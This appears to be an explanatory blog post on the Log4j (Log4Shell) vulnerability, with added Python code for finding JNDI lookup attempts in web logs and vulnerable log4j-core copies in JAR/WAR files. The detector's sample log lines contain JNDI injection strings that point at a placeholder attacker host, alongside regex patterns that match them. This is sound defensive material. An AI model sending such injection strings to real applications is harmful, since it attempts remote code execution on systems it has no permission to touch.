By now, you’ve likely heard about CVE-2021-44228, aka the L4J vulnerability, which is currently wreaking havoc among multitudes of IT systems around the world. Even if you don’t know exactly what L4J is, you at least understand from all of the news headlines that it is an extremely dangerous exploit with a maximum severity ranking of 10. In fact, many in the info-sec community, including Jen Easterly, director of the Cybersecurity and Infrastructure Security Agency (CISA), consider this the most dangerous exploit of their careers (for Easterly, a decades-long one), and rightly so. This attack has the potential to exceed the damage caused by the rival Apache Struts exploit (remember the Equifax breach?) or the SolarWinds supply-chain hack.
Still, with all the hoopla, you may be asking yourself: how does this really impact me? Well, to understand that, let’s first start by explaining exactly what L4J is. It all begins with Java. Java is a very popular coding language that is used to develop many of the applications and systems we use today (e.g., social media, gaming, banking, etc.). L4J is an open-source Java utility called a logging library. It is written in Java and is almost ALWAYS used in Java programming. The L4J logging library logs application events such as system error messages, or whenever a user enters data into a text field. Those logged events are then stored in a folder on the server. This may sound like a fairly mundane and routine practice, right?
Well, what makes this function exceptional is that L4J can actually interpret expressions inside the text it logs and perform network lookups for certain types of expressions. One of these is the JNDI lookup, named for the Java Naming and Directory Interface. Without going into a lot of technical details, a JNDI lookup is a specially formatted string of characters (expression) that can include a URL; L4J will make a call out to that URL and retrieve data from it. In its most simplistic terms, it means the L4J utility can be made to execute code that connects to an external server, collects data from that external server and then stores that data back on the original server. So, all a hacker needs to do is enter a JNDI expression that includes the URL of his/her malicious server into the “Search” field (or any text box, for that matter) of an affected app instead of legitimate search criteria. The L4J utility will read and then execute the expression by making a call out to the malicious server’s URL, retrieve a nefarious payload from it and then store that payload on the victim’s server. That payload can enable what’s called remote code execution, or RCE. The hacker now has access to the application’s server without ever having to enter a username and password.
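The pattern described above, that an attacker places a JNDI lookup expression into any text an application might log, is something a defender can hunt for in existing web-server logs. The following is an added example (not code from the original post): a small Python detector that parses access-log lines, URL-decodes the client-controlled fields (request line, Referer, User-Agent) the way the application would before logging them, and flags any `${...}` lookup expression, rating a `${jndi:...}` one as high. The log lines are constructed samples, `attacker.example` is a placeholder host, and the function names are my own.

```python
import re
from typing import Dict, List
from urllib.parse import unquote

# Combined/common access-log format. The quoted fields are the ones a remote
# client controls and that an application typically hands to its logger.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
LOOKUP_RE = re.compile(r'\$\{[^}]*\}')                     # any Log4j lookup ${...}
JNDI_RE = re.compile(r'\$\{\s*jndi\s*:', re.IGNORECASE)    # the JNDI lookup the post describes

# Constructed sample lines (not real traffic); attacker.example is a placeholder.
SAMPLE_LOG = "\n".join([
    '203.0.113.10 - - [10/Dec/2021:14:02:11 +0000] "GET /search?q=winter+coats HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.11 - - [10/Dec/2021:14:02:13 +0000] "GET /search?q=${jndi:ldap://attacker.example/a} HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.12 - - [10/Dec/2021:14:02:15 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "${JNDI:rmi://attacker.example/b}"',
    '203.0.113.13 - - [10/Dec/2021:14:02:17 +0000] "GET /search?q=%24%7Bjndi%3Aldap%3A%2F%2Fattacker.example%2Fc%7D HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.14 - - [10/Dec/2021:14:02:19 +0000] "GET /promo/${price} HTTP/1.1" 404 256 "-" "Mozilla/5.0"',
])


def scan_line(line: str) -> List[Dict[str, str]]:
    """Return one finding per lookup expression found in a client-controlled field."""
    m = LOG_RE.match(line)
    if not m:
        return []
    findings = []
    for field in ("request", "referer", "ua"):
        # The web server logs the raw request; the application logs the decoded
        # value, so decode before matching or an encoded expression slips past.
        value = unquote(m.group(field))
        for expr in LOOKUP_RE.findall(value):
            severity = "high" if JNDI_RE.search(expr) else "review"
            findings.append({
                "client": m.group("client"),
                "time": m.group("time"),
                "field": field,
                "expression": expr,
                "severity": severity,
            })
    return findings


def scan_log(text: str) -> List[Dict[str, str]]:
    """Scan a whole log (one entry per line) and flatten the findings."""
    return [f for line in text.splitlines() if line.strip() for f in scan_line(line)]


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"[{f['severity']:6}] {f['client']} {f['field']}: {f['expression']}")
```

A hit in the access log only proves that someone sent the expression; whether Log4j actually resolved it depends on which application, with which Log4j version, logged that field. Treat the `high` entries as leads for the next check (outbound LDAP/RMI connections from that host around `time`), and the `review` entries as lower-confidence noise that still deserves a look.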
So now let’s get back to how this will impact the average consumer. According to Java, over 3 billion devices around the world use Java. With these numbers and the ease of use of this exploit, its proliferation WILL be astronomical. The harm that can be caused by this exploit is far-reaching and can include (among other things):
◦ Distributed Denial of Service (DDoS): meaning no access to that favorite website for Christmas gifts
◦ Ransomware: even worse, all the files are encrypted and no paychecks can be distributed to pay for Christmas gifts
◦ Exfiltration: now someone has your info and will buy gifts on your dime
To make matters worse, there is absolutely NOTHING the average consumer can do to protect themselves from this exploit. While there is a fix (upgrading the L4J library to version 2.16 or above, or disabling L4J altogether), this is an action that can only be implemented by the application or systems administrator. The upgrade can also be more complex than most other software upgrades. Administrators not only have to determine whether their own apps are using L4J, but also whether the system’s third-party resources, backend services or other libraries bundle the L4J library. L4J is quite ubiquitous, and even though a fix exists, getting a handle on this exploit before hackers are able to do a sizable amount of damage will be a major feat for some enterprises, if it is possible at all. While worrying about this vulnerability won’t change much, a whole lot of patience and kindness towards your IT/Security team during this time could go a long way.
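The inventory problem the paragraph describes, finding every copy of the library including the ones hidden inside application archives, is the part administrators can automate. The following is an added example (not code from the original post or the Log4j project): a Python scanner that walks a directory, opens every JAR/WAR/EAR it finds, recurses into archives nested inside them, reports each copy of Log4j 2’s `JndiLookup` class with the version recorded in its Maven `pom.properties`, and marks anything below 2.16 (the threshold the post gives) as needing an upgrade. It builds its own constructed fixture in a temporary directory so it runs offline; the class bytes in the fixture are placeholders, not a real class file, and the function names are my own.

```python
import io
import os
import re
import tempfile
import zipfile
from typing import List, Optional, Tuple

# Log4j 2 ships the JNDI lookup as this class; Log4j 1.x has no such path and is
# outside the scope of this CVE, so this scanner deliberately does not flag it.
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")
FIXED_VERSION = (2, 16, 0)   # upgrade threshold stated in the post

Finding = Tuple[str, Optional[str], bool]   # (location, version, needs_upgrade)


def parse_version(text: Optional[str]) -> Tuple[int, int, int]:
    """'2.14.1' -> (2, 14, 1); missing parts are padded with 0."""
    nums = [int(n) for n in re.findall(r"\d+", text or "")][:3]
    return tuple(nums + [0] * (3 - len(nums)))  # type: ignore[return-value]


def log4j_core_version(zf: zipfile.ZipFile) -> Optional[str]:
    """Read the version Maven recorded inside a log4j-core jar, if present."""
    try:
        props = zf.read(POM_PROPS).decode("utf-8", "replace")
    except KeyError:
        return None   # shaded/repackaged copy: version unknown, still worth flagging
    m = re.search(r"^version=(\S+)", props, re.MULTILINE)
    return m.group(1) if m else None


def inspect_archive(data: bytes, label: str, findings: List[Finding]) -> None:
    """Look for the JNDI lookup class here, then recurse into nested archives."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return
    with zf:
        names = zf.namelist()
        if JNDI_CLASS in names:
            version = log4j_core_version(zf)
            needs_upgrade = version is None or parse_version(version) < FIXED_VERSION
            findings.append((label, version, needs_upgrade))
        for name in names:   # fat jars and WAR/EAR bundles hide their own copy
            if name.lower().endswith(ARCHIVE_EXT):
                inspect_archive(zf.read(name), f"{label}!{name}", findings)


def scan_tree(root: str) -> List[Finding]:
    """Scan every archive under root and return sorted findings."""
    findings: List[Finding] = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if fn.lower().endswith(ARCHIVE_EXT):
                path = os.path.join(dirpath, fn)
                with open(path, "rb") as fh:
                    label = os.path.relpath(path, root).replace(os.sep, "/")
                    inspect_archive(fh.read(), label, findings)
    return sorted(findings)


def build_fixture(root: str) -> None:
    """Constructed sample tree: a vulnerable jar, a patched jar, and a WAR bundling the vulnerable one."""
    def fake_log4j(version: str) -> bytes:
        buf = io.BytesIO()
        with zipfile.ZipFile(buf, "w") as zf:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")   # placeholder, not a real class
            zf.writestr(POM_PROPS, f"version={version}\nartifactId=log4j-core\n")
        return buf.getvalue()

    def plain_jar() -> bytes:
        buf = io.BytesIO()
        with zipfile.ZipFile(buf, "w") as zf:
            zf.writestr("com/example/Other.class", b"\xca\xfe\xba\xbe")
        return buf.getvalue()

    os.makedirs(os.path.join(root, "lib"), exist_ok=True)
    for version in ("2.14.1", "2.16.0"):
        with open(os.path.join(root, "lib", f"log4j-core-{version}.jar"), "wb") as fh:
            fh.write(fake_log4j(version))
    with zipfile.ZipFile(os.path.join(root, "shop.war"), "w") as war:
        war.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", fake_log4j("2.14.1"))
        war.writestr("WEB-INF/lib/other-lib.jar", plain_jar())


def demo() -> List[Finding]:
    with tempfile.TemporaryDirectory() as root:
        build_fixture(root)
        return scan_tree(root)


if __name__ == "__main__":
    for label, version, needs_upgrade in demo():
        print(f"{'UPGRADE' if needs_upgrade else 'ok':7} {label} (log4j-core {version})")
```

Point `scan_tree` at an application’s deployment directory rather than `demo()`’s fixture to use it for real. A copy with no `pom.properties` comes back with version `None` and is flagged, which is the right default: a repackaged library whose version cannot be read should be treated as unpatched until someone proves otherwise.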